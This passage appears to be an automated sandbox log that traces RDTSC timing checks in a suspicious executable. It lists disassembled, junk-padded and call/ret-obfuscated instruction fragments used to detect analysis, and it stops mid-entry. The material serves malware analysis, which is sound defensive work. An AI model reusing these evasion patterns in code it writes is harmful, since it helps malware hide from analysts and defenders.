Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D70F8 second address: 7D710F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCBACB2D11Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D710F second address: 7D711B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCBAD522AA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D711B second address: 7D712A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jo 00007FCBACB2D12Eh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D712A second address: 7D713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jo 00007FCBAD522AA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D728F second address: 7D7295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D7571 second address: 7D758D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FCBAD522AABh 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D758D second address: 7D7591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D9D66 second address: 7D9E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 19D5F9DFh 0x00000010 push 00000003h 0x00000012 mov edi, dword ptr [ebp+122D3950h] 0x00000018 push 00000000h 0x0000001a sub dword ptr [ebp+122D1CC3h], ecx 0x00000020 push 00000003h 0x00000022 mov dword ptr [ebp+1245338Dh], edx 0x00000028 push AA142277h 0x0000002d jmp 00007FCBAD522AABh 0x00000032 xor dword ptr [esp], 6A142277h 0x00000039 mov dword ptr [ebp+122D280Ch], esi 0x0000003f lea ebx, dword ptr [ebp+12455B88h] 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FCBAD522AA8h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000017h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f xchg eax, ebx 0x00000060 push edi 0x00000061 jmp 00007FCBAD522AB9h 0x00000066 pop edi 0x00000067 push eax 0x00000068 push edx 0x00000069 push esi 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D9EAC second address: 7D9EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7DA000 second address: 7DA004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7DA004 second address: 7DA00A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7DA00A second address: 7DA02E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d je 00007FCBAD522AA6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7DA173 second address: 7DA177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D2886 second address: 7D2896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBAD522AAAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F85D9 second address: 7F85DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F875F second address: 7F8764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8764 second address: 7F876A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8B80 second address: 7F8B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8B84 second address: 7F8BC1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBACB2D116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FCBACB2D143h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8BC1 second address: 7F8BCB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBAD522AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8D4C second address: 7F8D5C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FCBACB2D11Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8E90 second address: 7F8E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCBAD522AA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8E9B second address: 7F8EA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8EA2 second address: 7F8EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBAD522AACh 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007FCBAD522AA6h 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8EC6 second address: 7F8ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8ECC second address: 7F8ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8ED3 second address: 7F8EEE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FCBACB2D123h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F91F5 second address: 7F920D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBAD522AAFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F920D second address: 7F9211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F9340 second address: 7F936A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBAD522AB8h 0x0000000b popad 0x0000000c jmp 00007FCBAD522AABh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F9495 second address: 7F949B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F949B second address: 7F94A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F94A3 second address: 7F94C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a ja 00007FCBACB2D116h 0x00000010 pop ebx 0x00000011 popad 0x00000012 pushad 0x00000013 je 00007FCBACB2D11Eh 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7EFEE3 second address: 7EFF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FCBAD522AB6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F97AF second address: 7F97BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F97BB second address: 7F97BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F97BF second address: 7F97D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBACB2D11Ch 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F97D7 second address: 7F97DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F9D51 second address: 7F9D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F9EB6 second address: 7F9EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FA012 second address: 7FA016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FA016 second address: 7FA01C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FA485 second address: 7FA48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FECFB second address: 7FECFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FECFF second address: 7FED05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CD7A5 second address: 7CD7AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CD7AA second address: 7CD7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802132 second address: 802137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802137 second address: 802149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCBACB2D116h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80226E second address: 802272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802272 second address: 802278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802278 second address: 80229E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBAD522AB9h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80229E second address: 8022B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBACB2D116h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FCBACB2D116h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8022B1 second address: 8022B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 800952 second address: 800971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FCBACB2D11Fh 0x0000000e jo 00007FCBACB2D116h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8023DA second address: 8023DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8023DE second address: 8023E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8023E4 second address: 802408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBAD522AADh 0x00000008 jc 00007FCBAD522AA6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 js 00007FCBAD522AA6h 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802408 second address: 802412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802412 second address: 80244B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jmp 00007FCBAD522AAEh 0x00000015 jnp 00007FCBAD522AACh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80244B second address: 80245C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jno 00007FCBACB2D116h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80245C second address: 802463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806015 second address: 80601B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80601B second address: 806021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806021 second address: 806056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Fh 0x00000007 jnc 00007FCBACB2D12Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806056 second address: 80606C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FCBAD522AA8h 0x0000000c jnp 00007FCBAD522AAEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8061A0 second address: 8061A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8061A6 second address: 8061B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FCBAD522AA6h 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8061B5 second address: 8061BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80647A second address: 806493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806493 second address: 806498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806498 second address: 8064A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCBAD522AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806764 second address: 806768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806768 second address: 80676E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80676E second address: 806780 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FCBACB2D116h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806A25 second address: 806A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806A2B second address: 806A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806A32 second address: 806A52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB6h 0x00000007 jc 00007FCBAD522AACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8099FE second address: 809A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 809A02 second address: 809A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 809A08 second address: 809A0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C50BD second address: 7C50C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80A68B second address: 80A6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80A6A6 second address: 80A6B9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80A6B9 second address: 80A6D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80AA60 second address: 80AA64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80AA64 second address: 80AA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80B029 second address: 80B02F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80D5CC second address: 80D5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80EAB4 second address: 80EABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80E841 second address: 80E846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80EABA second address: 80EB34 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FCBAD522AA8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jo 00007FCBAD522ABAh 0x0000002f jo 00007FCBAD522AB4h 0x00000035 call 00007FCBAD522AADh 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007FCBAD522AA8h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 push 00000000h 0x00000059 mov esi, 4CC325E2h 0x0000005e xchg eax, ebx 0x0000005f push edi 